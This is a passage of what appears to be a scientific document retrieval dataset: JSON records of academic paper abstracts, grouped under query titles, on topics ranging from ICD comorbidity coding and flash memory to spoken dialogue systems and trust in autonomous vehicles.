"text": "Recently introduced 3D vertical flash memory is expected to be a disruptive technology since it overcomes scaling challenges of conventional 2D planar flash memory by stacking up cells in the vertical direction. However, 3D vertical flash memory suffers from a new problem known as fast detrapping, which is a rapid charge loss problem. In this paper, we propose a scheme to compensate the effect of fast detrapping by intentional inter-cell interference (ICI). In order to properly control the intentional ICI, our scheme relies on a coding technique that incorporates the side information of fast detrapping during the encoding stage. This technique is closely connected to the well-known problem of coding in a memory with defective cells. Numerical results show that the proposed scheme can effectively address the problem of fast detrapping.",
"title": ""
}
] | scidocsrr |
bbd34290c80347963ed7ad6a23acba13 | Coding algorithms for defining comorbidities in ICD-9-CM and ICD-10 administrative data. | [
{
"docid": "b1746ab2946c51bcd10360d051da351f",
"text": "BACKGROUND AND OBJECTIVE\nThe ICD-9-CM adaptation of the Charlson comorbidity score has been a valuable resource for health services researchers. With the transition into ICD-10 coding worldwide, an ICD-10 version of the Deyo adaptation was developed and validated using population-based hospital data from Victoria, Australia.\n\n\nMETHODS\nThe algorithm was translated from ICD-9-CM into ICD-10-AM (Australian modification) in a multistep process. After a mapping algorithm was used to develop an initial translation, these codes were manually examined by the coding experts and a general physician for face validity. Because the ICD-10 system is country specific, our goal was to keep many of the translated code at the three-digit level for generalizability of the new index.\n\n\nRESULTS\nThere appears to be little difference in the distribution of the Charlson Index score between the two versions. A strong association between increasing index scores and mortality exists: the area under the ROC curve is 0.865 for the last year using the ICD-9-CM version and remains high, at 0.855, for the ICD-10 version.\n\n\nCONCLUSION\nThis work represents the first rigorous adaptation of the Charlson comorbidity index for use with ICD-10 data. In comparison with a well-established ICD-9-CM coding algorithm, it yields closely similar prevalence and prognosis information by comorbidity category.",
"title": ""
}
] | [
{
"docid": "40e064fb1e9067cb2302baf73ce1548e",
"text": "Selecting the most appropriate research method is one of the most difficult problems facing a doctoral researcher. Grounded Theory is presented here as a method of choice as it is detailed, rigorous, and systematic, yet it also permits flexibility and freedom. Grounded Theory offers many benefits to research in Information Systems as it is suitable for the investigation of complex multifaceted phenomena. It is also well equipped to explore socially related issues. Despite existing criticism, it is a rigorous and methodical research approach capable of broadening the perceptions of those in the research community. This paper provides detailed and practical guidelines that illustrate the techniques, utility, and ease of use of grounded theory, especially as these apply to information systems based research. This paper tracks a Grounded Theory research project undertaken to study the phenomena of collaboration and knowledge sharing in the Australian Film Industry. It uses this to illustrate and emphasize salient points to assist potential users in applying the method. The very practical approach shared in this paper provides a focused critique rendering it a valuable contribution to the discussion of methods of analysis in the IS sphere, particularly grounded theory.",
"title": ""
},
{
"docid": "5cf757aab033db7ccd52cf23e2be32b3",
"text": "This paper presents investigation on speech recognition classification performance when using different standard neural networks structures as a classifier. Those cases include usage of a Feed-forward Neural Network (NN) with back propagation algorithm and a Radial Basis Functions (RBF) Neural Network.",
"title": ""
},
{
"docid": "780f2a97da4f18fc3710fa0ca0489ef4",
"text": "MapReduce has gradually become the framework of choice for \"big data\". The MapReduce model allows for efficient and swift processing of large scale data with a cluster of compute nodes. However, the efficiency here comes at a price. The performance of widely used MapReduce implementations such as Hadoop suffers in heterogeneous and load-imbalanced clusters. We show the disparity in performance between homogeneous and heterogeneous clusters in this paper to be high. Subsequently, we present MARLA, a MapReduce framework capable of performing well not only in homogeneous settings, but also when the cluster exhibits heterogeneous properties. We address the problems associated with existing MapReduce implementations affecting cluster heterogeneity, and subsequently present through MARLA the components and trade-offs necessary for better MapReduce performance in heterogeneous cluster and cloud environments. We quantify the performance gains exhibited by our approach against Apache Hadoop and MARIANE in data intensive and compute intensive applications.",
"title": ""
},
{
"docid": "07657456a2328be11dfaf706b5728ddc",
"text": "Knowledge of wheelchair kinematics during a match is prerequisite for performance improvement in wheelchair basketball. Unfortunately, no measurement system providing key kinematic outcomes proved to be reliable in competition. In this study, the reliability of estimated wheelchair kinematics based on a three inertial measurement unit (IMU) configuration was assessed in wheelchair basketball match-like conditions. Twenty participants performed a series of tests reflecting different motion aspects of wheelchair basketball. During the tests wheelchair kinematics were simultaneously measured using IMUs on wheels and frame, and a 24-camera optical motion analysis system serving as gold standard. Results showed only small deviations of the IMU method compared to the gold standard, once a newly developed skid correction algorithm was applied. Calculated Root Mean Square Errors (RMSE) showed good estimates for frame displacement (RMSE≤0.05 m) and speed (RMSE≤0.1m/s), except for three truly vigorous tests. Estimates of frame rotation in the horizontal plane (RMSE<3°) and rotational speed (RMSE<7°/s) were very accurate. Differences in calculated Instantaneous Rotation Centres (IRC) were small, but somewhat larger in tests performed at high speed (RMSE up to 0.19 m). Average test outcomes for linear speed (ICCs>0.90), rotational speed (ICC>0.99) and IRC (ICC> 0.90) showed high correlations between IMU data and gold standard. IMU based estimation of wheelchair kinematics provided reliable results, except for brief moments of wheel skidding in truly vigorous tests. The IMU method is believed to enable prospective research in wheelchair basketball match conditions and contribute to individual support of athletes in everyday sports practice.",
"title": ""
},
{
"docid": "4160267cb2de92621edb5634a3bb985e",
"text": "This paper reports the results of a study carried out to assess the benefits, impediments and major critical success factors in adopting business to consumer e-business solutions. A case study method of investigation was used, and the experiences of six online companies and two bricks and mortar companies were documented. The major impediments identified are: leadership issues, operational issues, technology, and ineffective solution design. The critical success factors in the adoption of e-business are identified as: combining e-business knowledge, value proposition and delivery measurement, customer satisfaction and retention, monitoring internal processes and competitor activity, and finally building trust. Findings suggest that above all, adoption of e-business should be appropriate, relevant, value adding, and operationally as well as strategically viable for an organization instead of being a result of apprehensive compliance. q 2004 Published by Elsevier Ltd.",
"title": ""
},
{
"docid": "be90932dfddcf02b33fc2ef573b8c910",
"text": "Style-based Text Categorization: What Newspaper Am I Reading?",
"title": ""
},
{
"docid": "5c50099c8a4e638736f430e3b5622b1d",
"text": "BACKGROUND\nAccording to the existential philosophers, meaning, purpose and choice are necessary for quality of life. Qualitative researchers exploring the perspectives of people who have experienced health crises have also identified the need for meaning, purpose and choice following life disruptions. Although espousing the importance of meaning in occupation, occupational therapy theory has been primarily preoccupied with purposeful occupations and thus appears inadequate to address issues of meaning within people's lives.\n\n\nPURPOSE\nThis paper proposes that the fundamental orientation of occupational therapy should be the contributions that occupation makes to meaning in people's lives, furthering the suggestion that occupation might be viewed as comprising dimensions of meaning: doing, being, belonging and becoming. Drawing upon perspectives and research from philosophers, social scientists and occupational therapists, this paper will argue for a renewed understanding of occupation in terms of dimensions of meaning rather than as divisible activities of self-care, productivity and leisure.\n\n\nPRACTICE IMPLICATIONS\nFocusing on meaningful, rather than purposeful occupations more closely aligns the profession with its espoused aspiration to enable the enhancement of quality of life.",
"title": ""
},
{
"docid": "a56166eefea29633c1567212229b5dc9",
"text": "This paper suggests a routing method for automated guided vehicles in port terminals that uses the Q-learning technique. One of the most important issues for the efficient operation of an automated guided vehicle system is to find shortest routes for the vehicles. In this paper, we determine shortest-time routes inclusive of the expected waiting times instead of simple shortest-distance routes, which are usually used in practice. For the determination of the total travel time, the waiting time must be estimated accurately. This study proposes a method for estimating for each vehicle the waiting time that results from the interferences among vehicles during travelling. The estimation of the waiting times is achieved by using the Q-learning technique and by constructing the shortesttime routing matrix for each given set of positions of quay cranes. An experiment was performed to evaluate the performance of the learning algorithm and to compare the performance of the learning-based routes with that of the shortest-distance routes by a simulation study.",
"title": ""
},
{
"docid": "b2261ae40cb837da9aca69916590a7b2",
"text": "Since many languages originated from a common ancestral language and influence each other, there would inevitably exist similarities between these languages such as lexical similarity and named entity similarity. In this paper, we leverage these similarities to improve the translation performance in neural machine translation. Specifically, we introduce an attention-via-attention mechanism that allows the information of source-side characters flowing to the target side directly. With this mechanism, the target-side characters will be generated based on the representation of source-side characters when the words are similar. For instance, our proposed neural machine translation system learns to transfer the characterlevel information of the English word ‘system’ through the attention-via-attention mechanism to generate the Czech word ‘systém’. Consequently, our approach is able to not only achieve a competitive translation performance, but also reduce the model size significantly.",
"title": ""
},
{
"docid": "1afc1c806f41e93d40d362f81be87b5d",
"text": "Forward thinking organizations recognize that data management solutions on their own are becoming very expensive and failing cope with reality. They need to solve the data problem in a different way, through the implementation of an effective Data Governance. Data Governance needs to take a policy-centric approach to data models, data quality standards, data security and lifecycle management, and processes for defining, implementing and enforcing these policies. Until recently, data governance has largely been informal, in siloes around specific enterprise repositories, lacking structure and the wider support of the organization. In many government departments, data governance exists as a set of very ambiguous and generic regulations. The area of data governance is still under-researched, despite its importance. With the emergence of Cloud computing, and its increased adoption by businesses, public organisations and governments, as much as the potential gains from adopting the technology, businesses face new and more complex challenges. Such emphasize the need for effective data governance strategy and programs, which can ensure best returns for cloud adoption. This paper is one of very few published research, which tackles this subject domain, and attempts to lay its foundations.",
"title": ""
},
{
"docid": "b9f01e4f6136b3e02e637dcf5e0f14c9",
"text": "Recent theoretical advances have enabled the use of special monotonic aggregates in recursion. These special aggregates make possible the concise expression and efficient implementation of a rich new set of advanced applications. Among these applications, graph queries are particularly important because of their pervasiveness in data intensive application areas. In this demonstration, we present our Deductive Application Language (DeAL) System, the first of a new generation of Deductive Database Systems that support applications that could not be expressed using regular stratification, or could be expressed using XY-stratification (also supported in DeAL) but suffer from inefficient execution. Using example queries, we will (i) show how complex graph queries can be concisely expressed using DeAL and (ii) illustrate the formal semantics and efficient implementation of these powerful new monotonic constructs.",
"title": ""
},
{
"docid": "6ad344c7049abad62cd53dacc694c651",
"text": "Primary syphilis with oropharyngeal manifestations should be kept in mind, though. Lips and tongue ulcers are the most frequently reported lesions and tonsillar ulcers are much more rare. We report the case of a 24-year-old woman with a syphilitic ulcer localized in her left tonsil.",
"title": ""
},
{
"docid": "f70f4704b23733e6f837fd4e9343be88",
"text": "222 Abstract— This paper investigates the effectiveness of OFDM and proven in other conventional (narrowband) commercial radio technologies (e.g. DS-CDMA in cell phones) (e.g. OFDM in IEEE 802.11a/g).. The main aim was to assess the suitability of OFDM as a modulation technique for a fixed wireless phone system for rural areas. However, its suitability for more general wireless applications is also assessed. Most third generation mobile phone systems are proposing to use Code Division Multiple Access (CDMA) as their modulation technique. For this reason, CDMA is also investigated so that the performance of CDMA could be compared with OFDM on the basis of various wireless parameters. At the end it is concluded that the good features of both the modulation schemes can be combined in an intelligent way to get the best modulation scheme as a solution for wireless communication high speed requirement, channel problems and increased number of users.",
"title": ""
},
{
"docid": "e56efa06a1af42ab3c14754ea70e1f1d",
"text": "The wide diffusion of mobile devices has motivated research towards optimizing energy consumption of software systems— including apps—targeting such devices. Besides efforts aimed at dealing with various kinds of energy bugs, the adoption of Organic Light-Emitting Diode (OLED) screens has motivated research towards reducing energy consumption by choosing an appropriate color palette. Whilst past research in this area aimed at optimizing energy while keeping an acceptable level of contrast, this paper proposes an approach, named GEMMA (Gui Energy Multi-objective optiMization for Android apps), for generating color palettes using a multi- objective optimization technique, which produces color solutions optimizing energy consumption and contrast while using consistent colors with respect to the original color palette. An empirical evaluation that we performed on 25 Android apps demonstrates not only significant improvements in terms of the three different objectives, but also confirmed that in most cases users still perceived the choices of colors as attractive. Finally, for several apps we interviewed the original developers, who in some cases expressed the intent to adopt the proposed choice of color palette, whereas in other cases pointed out directions for future improvements",
"title": ""
},
{
"docid": "bd3feae3ff8f8546efc1290e325b5a4e",
"text": "A bond pad failure mechanism of galvanic corrosion was studied. Analysis results showed that over-etch process, EKC and DI water over cleaning revealed more pitting with Cu seed due to galvanic corrosion. To control and eliminate galvanic corrosion, the etch recipe was optimized and etch time was reduced about 15% to prevent damaging the native oxide. EKC cleaning time was remaining unchanged in order to maintain bond pad F level at minimum level. In this study, the PRS process was also optimized and CF4 gas ratio was reduced about 45%. Moreover, 02 process was added after PRS process so as to increase the native oxide layer on Al bondpads to prevent galvanic corrosion.",
"title": ""
},
{
"docid": "35830166ddf17086a61ab07ec41be6b0",
"text": "As the need for Human Computer Interaction (HCI) designers increases so does the need for courses that best prepare students for their future work life. Multidisciplinary teamwork is what very frequently meets the graduates in their new work situations. Preparing students for such multidisciplinary work through education is not easy to achieve. In this paper, we investigate ways to engage computer science students, majoring in design, use, and interaction (with technology), in design practices through an advanced graduate course in interaction design. Here, we take a closer look at how prior embodied and explicit knowledge of HCI that all of the students have, combined with understanding of design practice through the course, shape them as human-computer interaction designers. We evaluate the results of the effort in terms of increase in creativity, novelty of ideas, body language when engaged in design activities, and in terms of perceptions of how well this course prepared the students for the work practice outside of the university. Keywords—HCI education; interaction design; studio; design education; multidisciplinary teamwork.",
"title": ""
},
{
"docid": "b58055779111f5ae0b6cf5b70220b20e",
"text": "Screen media usage, sleep time and socio-demographic features are related to adolescents' academic performance, but interrelations are little explored. This paper describes these interrelations and behavioral profiles clustered in low and high academic performance. A nationally representative sample of 3,095 Spanish adolescents, aged 12 to 18, was surveyed on 15 variables linked to the purpose of the study. A Self-Organizing Maps analysis established non-linear interrelationships among these variables and identified behavior patterns in subsequent cluster analyses. Topological interrelationships established from the 15 emerging maps indicated that boys used more passive videogames and computers for playing than girls, who tended to use mobile phones to communicate with others. Adolescents with the highest academic performance were the youngest. They slept more and spent less time using sedentary screen media when compared to those with the lowest performance, and they also showed topological relationships with higher socioeconomic status adolescents. Cluster 1 grouped boys who spent more than 5.5 hours daily using sedentary screen media. Their academic performance was low and they slept an average of 8 hours daily. Cluster 2 gathered girls with an excellent academic performance, who slept nearly 9 hours per day, and devoted less time daily to sedentary screen media. Academic performance was directly related to sleep time and socioeconomic status, but inversely related to overall sedentary screen media usage. Profiles from the two clusters were strongly differentiated by gender, age, sedentary screen media usage, sleep time and academic achievement. Girls with the highest academic results had a medium socioeconomic status in Cluster 2. Findings may contribute to establishing recommendations about the timing and duration of screen media usage in adolescents and appropriate sleep time needed to successfully meet the demands of school academics and to improve interventions targeting to affect behavioral change.",
"title": ""
},
{
"docid": "eb0a907ad08990b0fe5e2374079cf395",
"text": "We examine whether tolerance for failure spurs corporate innovation based on a sample of venture capital (VC) backed IPO firms. We develop a novel measure of VC investors’ failure tolerance by examining their tendency to continue investing in a venture conditional on the venture not meeting milestones. We find that IPO firms backed by more failure-tolerant VC investors are significantly more innovative. A rich set of empirical tests shows that this result is not driven by the endogenous matching between failure-tolerant VCs and startups with high exante innovation potentials. Further, we find that the marginal impact of VC failure tolerance on startup innovation varies significantly in the cross section. Being financed by a failure-tolerant VC is much more important for ventures that are subject to high failure risk. Finally, we examine the determinants of the cross-sectional heterogeneity in VC failure tolerance. We find that both capital constraints and career concerns can negatively distort VC failure tolerance. We also show that younger and less experienced VCs are more exposed to these distortions, making them less failure tolerant than more established VCs.",
"title": ""
},
{
"docid": "7a3c965719e15d5afd6da28c12a78b01",
"text": "Prevalence of suicide attempts, self-injurious behaviors, and associated psychosocial factors were examined in a clinical sample of transgender (TG) adolescents and emerging adults (n = 96). Twenty-seven (30.3%) TG youth reported a history of at least one suicide attempt and 40 (41.8%) reported a history of self-injurious behaviors. There was a higher frequency of suicide attempts in TG youth with a desire for weight change, and more female-to-male youth reported a history of suicide attempts and self-harm behaviors than male-to-female youth. Findings indicate that this population is at a high risk for psychiatric comorbidities and life-threatening behaviors.",
"title": ""
},
{
"docid": "0d0c44dd4fd5b89edc29763ad038540b",
"text": "There is at present limited understanding of the neurobiological basis of the different processes underlying emotion perception. We have aimed to identify potential neural correlates of three processes suggested by appraisalist theories as important for emotion perception: 1) the identification of the emotional significance of a stimulus; 2) the production of an affective state in response to 1; and 3) the regulation of the affective state. In a critical review, we have examined findings from recent animal, human lesion, and functional neuroimaging studies. Findings from these studies indicate that these processes may be dependent upon the functioning of two neural systems: a ventral system, including the amygdala, insula, ventral striatum, and ventral regions of the anterior cingulate gyrus and prefrontal cortex, predominantly important for processes 1 and 2 and automatic regulation of emotional responses; and a dorsal system, including the hippocampus and dorsal regions of anterior cingulate gyrus and prefrontal cortex, predominantly important for process 3. We suggest that the extent to which a stimulus is identified as emotive and is associated with the production of an affective state may be dependent upon levels of activity within these two neural systems.",
"title": ""
}
] | scidocsrr |
fe79613a8551d3c9558768fd69a333f9 | Deep contextual language understanding in spoken dialogue systems | [
{
"docid": "1dd8fdb5f047e58f60c228e076aa8b66",
"text": "Recurrent Neural Network Language Models (RNN-LMs) have recently shown exceptional performance across a variety of applications. In this paper, we modify the architecture to perform Language Understanding, and advance the state-of-the-art for the widely used ATIS dataset. The core of our approach is to take words as input as in a standard RNN-LM, and then to predict slot labels rather than words on the output side. We present several variations that differ in the amount of word context that is used on the input side, and in the use of non-lexical features. Remarkably, our simplest model produces state-of-the-art results, and we advance state-of-the-art through the use of bagof-words, word embedding, named-entity, syntactic, and wordclass features. Analysis indicates that the superior performance is attributable to the task-specific word representations learned by the RNN.",
"title": ""
},
{
"docid": "ea200dc100d77d8c156743bede4a965b",
"text": "We present a contextual spoken language understanding (contextual SLU) method using Recurrent Neural Networks (RNNs). Previous work has shown that context information, specifically the previously estimated domain assignment, is helpful for domain identification. We further show that other context information such as the previously estimated intent and slot labels are useful for both intent classification and slot filling tasks in SLU. We propose a step-n-gram model to extract sentence-level features from RNNs, which extract sequential features. The step-n-gram model is used together with a stack of Convolution Networks for training domain/intent classification. Our method therefore exploits possible correlations among domain/intent classification and slot filling and incorporates context information from the past predictions of domain/intent and slots. The proposed method obtains new state-of-the-art results on ATIS and improved performances over baseline techniques such as conditional random fields (CRFs) on a large context-sensitive SLU dataset.",
"title": ""
},
{
"docid": "84f688155a92ed2196974d24b8e27134",
"text": "My sincere thanks to Donald Norman and David Rumelhart for their support of many years. I also wish to acknowledge the help of The views and conclusions contained in this document are those of the author and should not be interpreted as necessarily representing the official policies, either expressed or implied, of the sponsoring agencies. Approved for public release; distribution unlimited. Reproduction in whole or in part is permitted for any purpose of the United States Government Requests for reprints should be sent to the",
"title": ""
}
] | [
{
"docid": "1a101ae3faeaa775737799c2324ef603",
"text": "in recent years, greenhouse technology in agriculture is to automation, information technology direction with the IOT (internet of things) technology rapid development and wide application. In the paper, control networks and information networks integration of IOT technology has been studied based on the actual situation of agricultural production. Remote monitoring system with internet and wireless communications combined is proposed. At the same time, taking into account the system, information management system is designed. The collected data by the system provided for agricultural research facilities.",
"title": ""
},
{
"docid": "d3049fee1ed622515f5332bcfa3bdd7b",
"text": "PURPOSE\nTo prospectively analyze, using validated outcome measures, symptom improvement in patients with mild to moderate cubital tunnel syndrome treated with rigid night splinting and activity modifications.\n\n\nMETHODS\nNineteen patients (25 extremities) were enrolled prospectively between August 2009 and January 2011 following a diagnosis of idiopathic cubital tunnel syndrome. Patients were treated with activity modifications as well as a 3-month course of rigid night splinting maintaining 45° of elbow flexion. Treatment failure was defined as progression to operative management. Outcome measures included patient-reported splinting compliance as well as the Quick Disabilities of the Arm, Shoulder, and Hand questionnaire and the Short Form-12. Follow-up included a standardized physical examination. Subgroup analysis included an examination of the association between splinting success and ulnar nerve hypermobility.\n\n\nRESULTS\nTwenty-four of 25 extremities were available at mean follow-up of 2 years (range, 15-32 mo). Twenty-one of 24 (88%) extremities were successfully treated without surgery. We observed a high compliance rate with the splinting protocol during the 3-month treatment period. Quick Disabilities of the Arm, Shoulder, and Hand scores improved significantly from 29 to 11, Short Form-12 physical component summary score improved significantly from 45 to 54, and Short Form-12 mental component summary score improved significantly from 54 to 62. Average grip strength increased significantly from 32 kg to 35 kg, and ulnar nerve provocative testing resolved in 82% of patients available for follow-up examination.\n\n\nCONCLUSIONS\nRigid night splinting when combined with activity modification appears to be a successful, well-tolerated, and durable treatment modality in the management of cubital tunnel syndrome. We recommend that patients presenting with mild to moderate symptoms consider initial treatment with activity modification and rigid night splinting for 3 months based on a high likelihood of avoiding surgical intervention.\n\n\nTYPE OF STUDY/LEVEL OF EVIDENCE\nTherapeutic II.",
"title": ""
},
{
"docid": "4b2b4caa7dbf747833ff0f5f669ffa64",
"text": "This paper studies the use of everyday words to describe images. The common saying has it that 'a picture is worth a thousand words', here we ask which thousand? The proliferation of tagged social multimedia data presents a challenge to understanding collective tag-use at large scale -- one can ask if patterns from photo tags help understand tag-tag relations, and how it can be leveraged to improve visual search and recognition. We propose a new method to jointly analyze three distinct visual knowledge resources: Flickr, ImageNet/WordNet, and ConceptNet. This allows us to quantify the visual relevance of both tags learn their relationships. We propose a novel network estimation algorithm, Inverse Concept Rank, to infer incomplete tag relationships. We then design an algorithm for image annotation that takes into account both image and tag features. We analyze over 5 million photos with over 20,000 visual tags. The statistics from this collection leads to good results for image tagging, relationship estimation, and generalizing to unseen tags. This is a first step in analyzing picture tags and everyday semantic knowledge. Potential other applications include generating natural language descriptions of pictures, as well as validating and supplementing knowledge databases.",
"title": ""
},
{
"docid": "226882264b7582aeb1769ab49952fe37",
"text": "A novel method aimed at reducing radar cross section (RCS) under incident waves with both x- and y-polarizations, with the radiation characteristics of the antenna preserved, is presented and investigated. The goal is accomplished by the implementation of the polarization conversion metamaterial (PCM) and the principle of passive cancellation. As a test case, a microstrip patch antenna is simulated and experimentally measured to demonstrate the proposed strategy for dramatic radar cross section reduction (RCSR). Results exhibit that in-band RCSR is as much as 16 dB compared to the reference antenna. In addition, the PCM has a contribution to a maximum RCSR value of 14 dB out of the operating band. With significant RCSR and unobvious effect on the radiation performance of the antenna, the proposed method has a wide application for the design of other antennas with a requirement of RCS control.",
"title": ""
},
{
"docid": "efa566cdd4f5fa3cb12a775126377cb5",
"text": "This paper deals with the electromagnetic emissions of integrated circuits. In particular, four measurement techniques to evaluate integrated circuit conducted emissions are described in detail and they are employed for the measurement of the power supply conducted emission delivered by a simple integrated circuit composed of six synchronous switching drivers. Experimental results obtained by employing such measurement methods are presented and the influence of each test setup on the measured quantities is discussed.",
"title": ""
},
{
"docid": "9d3c4cef17b6736fa9c940051c642e29",
"text": "A zero-knowledge interactive proof is a protocol by which Alice can convince a polynomially-bounded Bob of the truth of some theorem without giving him any hint as to how the proof might proceed. Under cryptographic assumptions, we give a general technique for achieving this goal for every problem in NP. This extends to a presumably larger class, which combines the powers of non-determinism and randomness. Our protocol is powerful enough to allow Mice to convince Bob of theorems for which she does not even have a proof: it is enough for Alice to convince herself probabilistidly of a theorem, perhaps thanks to her knowledge of some trap-door information, in order for her to be able to convince Bob as well, without compromising the map-door in any way.",
"title": ""
},
{
"docid": "1b41ef1a81776e037b8b4c70f8a45f60",
"text": "The “interpretation” framework in Pattern Recognition (PR) arises in the many cases in which the more classical paradigm of “classification” is not properly applicable, generally because the number of classes is rather large, or simply because the concept of “class” does not hold. A very general way of representing the results of Interpretations of given objects or data is in terms of sentences of a “Semantic Language” in which the actions to be performed for each different object or datum are described. Interpretation can therefore be conveniently formalized through the concept of Formal Transduction, giving rise to the central PR problem of how to automatically learn a transducer from a training set of examples of the desired input-output behavior. This paper presents a formalization of the stated transducer learning problem, as well as an effective and efficient method for the inductive learning of an important class of transducers, namely, the class of Subsequential Tranducers. The capabilities of subsequential transductions are illustrated through a series of experiments which also show the high effectiveness of the proposed learning method to obtain very accurate and compact transducers for the corresponding tasks. * Work partially supported by the Spanish CICYT under grant TIC-0448/89 © IEEE Transactions on Pattern Analysis and Machine Intelligence, 15(5):448-458, 1993.",
"title": ""
},
{
"docid": "b637196c4627fd463ca54d0efeb87370",
"text": "Vision-based lane detection is a critical component of modern automotive active safety systems. Although a number of robust and accurate lane estimation (LE) algorithms have been proposed, computationally efficient systems that can be realized on embedded platforms have been less explored and addressed. This paper presents a framework that incorporates contextual cues for LE to further enhance the performance in terms of both computational efficiency and accuracy. The proposed context-aware LE framework considers the state of the ego vehicle, its surroundings, and the system-level requirements to adapt and scale the LE process resulting in substantial computational savings. This is accomplished by synergistically fusing data from multiple sensors along with the visual data to define the context around the ego vehicle. The context is then incorporated as an input to the LE process to scale it depending on the contextual requirements. A detailed evaluation of the proposed framework on real-world driving conditions shows that the dynamic and static configuration of the lane detection process results in computation savings as high as 90%, without compromising on the accuracy of LE.",
"title": ""
},
{
"docid": "dc8b19649f217d7fde46bb458d186923",
"text": "Sophisticated technology is increasingly replacing human minds to perform complicated tasks in domains ranging from medicine to education to transportation. We investigated an important theoretical determinant of people's willingness to trust such technology to perform competently—the extent to which a nonhuman agent is anthropomorphized with a humanlike mind—in a domain of practical importance, autonomous driving. Participants using a driving simulator drove either a normal car, an autonomous vehicle able to control steering and speed, or a comparable autonomous vehicle augmented with additional anthropomorphic features—name, gender, and voice. Behavioral, physiological, and self-report measures revealed that participants trusted that the vehicle would perform more competently as it acquired more anthropomorphic features. Technology appears better able to perform its intended design when it seems to have a humanlike mind. These results suggest meaningful consequences of humanizing technology, and also offer insights into the inverse process of objectifying humans. Word Count: 148 Anthropomorphism Increases Trust, 3 Technology is an increasingly common substitute for humanity. Sophisticated machines now perform tasks that once required a thoughtful human mind, from grading essays to diagnosing cancer to driving a car. As engineers overcome design barriers to creating such technology, important psychological barriers that users will face when using this technology emerge. Perhaps most important, will people be willing to trust competent technology to replace a human mind, such as a teacher’s mind when grading essays, or a doctor’s mind when diagnosing cancer, or their own mind when driving a car? Our research tests one important theoretical determinant of trust in any nonhuman agent: anthropomorphism (Waytz, Cacioppo, & Epley, 2010). Anthropomorphism is a process of inductive inference whereby people attribute to nonhumans distinctively human characteristics, particularly the capacity for rational thought (agency) and conscious feeling (experience; Gray, Gray, & Wegner, 2007). Philosophical definitions of personhood focus on these mental capacities as essential to being human (Dennett, 1978; Locke, 1841/1997). Furthermore, studies examining people’s lay theories of humanness show that people define humanness in terms of emotions that implicate higher order mental process such as self-awareness and memory (e.g., humiliation, nostalgia; Leyens et al., 2000) and traits that involve cognition and emotion (e.g., analytic, insecure; Haslam, 2006). Anthropomorphizing a nonhuman does not simply involve attributing superficial human characteristics (e.g., a humanlike face or body) to it, but rather attributing essential human characteristics to the agent (namely a humanlike mind, capable of thinking and feeling). Trust is a multifaceted concept that can refer to belief that another will behave with benevolence, integrity, predictability, or competence (McKnight & Chervany, 2001). Our prediction that anthropomorphism will increase trust centers on this last component of trust in another's competence (akin to confidence) (Siegrist, Earle, & Gutscher, 2003; Twyman, Harvey, & Harries, Anthropomorphism Increases Trust, 4 2008). Just as a patient would trust a thoughtful doctor to diagnose cancer more than a thoughtless one, or would rely on mindful cab driver to navigate through rush hour traffic more than a mindless cab driver, this conceptualization of anthropomorphism predicts that people would trust easily anthropomorphized technology to perform its intended function more than seemingly mindless technology. An autonomous vehicle (one that that drives itself) for instance, should seem better able to navigate through traffic when it seems able to think and sense its surroundings than when it seems to be simply mindless machinery. Or a “warbot” intended to kill should seem more lethal and sinister when it appears capable of thinking and planning than when it seems to be simply a computer mindlessly following an operator’s instructions. The more technology seems to have humanlike mental capacities, the more people should trust it to perform its intended function competently, regardless of the valence of its intended function (Epley, Caruso, & Bazerman, 2006; Pierce, Kilduff, Galinsky, & Sivanathan, 2013). This prediction builds on the common association between people’s perceptions of others’ mental states and of competent action. Because mindful agents appear capable of controlling their own actions, people judge others to be more responsible for successful actions they perform with conscious awareness, foresight, and planning (Cushman, 2008; Malle & Knobe, 1997) than for actions they perform mindlessly (see Alicke, 2000; Shaver, 1985; Weiner, 1995). Attributing a humanlike mind to a nonhuman agent should therefore more make the agent seem better able to control its own actions, and therefore better able to perform its intended functions competently. Our prediction also advances existing research on the consequences of anthropomorphism by articulating the psychological processes by which anthropomorphism could affect trust in technology (Nass & Moon, 2000), and by both experimentally manipulating anthropomorphism as well as measuring it as a critical mediator. Some experiments have manipulated the humanlike appearance of robots and Anthropomorphism Increases Trust, 5 assessed measures indirectly related to trust. However, such studies have not measured whether such superficial manipulations actually increases the attribution of essential humanlike qualities to that agent (the attribution we predict is critical for trust in technology; Hancock, Billings, Schaeffer, Chen, De Visser, 2011), and therefore cannot explain factors found ad-hoc to moderate the apparent effect of anthropomorphism on trust (Pak, Fink, Price, Bass, & Sturre, 2012). Another study found that individual differences in anthropomorphism predicted differences in willingness to trust technology in hypothetical scenarios (Waytz et al., 2010), but did not manipulate anthropomorphism experimentally. Our experiment is therefore the first to test our theoretical model of how anthropomorphism affects trust in technology. We conducted our experiment in a domain of practical relevance: people’s willingness to trust an autonomous vehicle. Autonomous vehicles—cars that control their own steering and speed—are expected to account for 75% of vehicles on the road by 2040 (Newcomb, 2012). Employing these autonomous features means surrendering personal control of the vehicle and trusting technology to drive safely. We manipulated the ease with which a vehicle, approximated by a driving simulator, could be anthropomorphized by merely giving it independent agency, or by also giving it a name, gender, and a human voice. We predicted that independent agency alone would make the car seem more mindful than a normal car, and that adding further anthropomorphic qualities would make the vehicle seem even more mindful. More important, we predicted that these relative increases in anthropomorphism would increase physiological, behavioral, and psychological measures of trust in the vehicle’s ability to drive effectively. Because anthropomorphism increases trust in the agent’s ability to perform its job, we also predicted that increased anthropomorphism of an autonomous agent would mitigate blame for an agent’s involvement in an undesirable outcome. To test this, we implemented a virtually unavoidable Anthropomorphism Increases Trust, 6 accident during the driving simulation in which participants were struck by an oncoming car, an accident clearly caused by the other driver. We implemented this to maintain experimental control over participants’ experience because everyone in the autonomous vehicle conditions would get into the same accident, one clearly caused by the other driver. Indeed, when two people are potentially responsible for an outcome, the agent seen to be more competent tends to be credited for a success whereas the agent seen to be less competent tends to be blamed for a failure (Beckman, 1970; Wetzel, 1972). Because we predicted that anthropomorphism would increase trust in the vehicle’s competence, we also predicted that it would reduce blame for an accident clear caused by another vehicle. Experiment Method One hundred participants (52 female, Mage=26.39) completed this experiment using a National Advanced Driving Simulator. Once in the simulator, the experimenter attached physiological equipment to participants and randomly assigned them to condition: Normal, Agentic, or Anthropomorphic. Participants in the Normal condition drove the vehicle themselves, without autonomous features. Participants in the Agentic condition drove a vehicle capable of controlling its steering and speed (an “autonomous vehicle”). The experimenter followed a script describing the vehicle's features, suggesting when to use the autonomous features, and describing what was about to happen. Participants in the Anthropomorphic condition drove the same autonomous vehicle, but with additional anthropomorphic features beyond mere agency—the vehicle was referred to by name (Iris), was given a gender (female), and was given a voice through human audio files played at predetermined times throughout the course. The voice files followed the same script used by the experimenter in the Agentic condition, modified where necessary (See 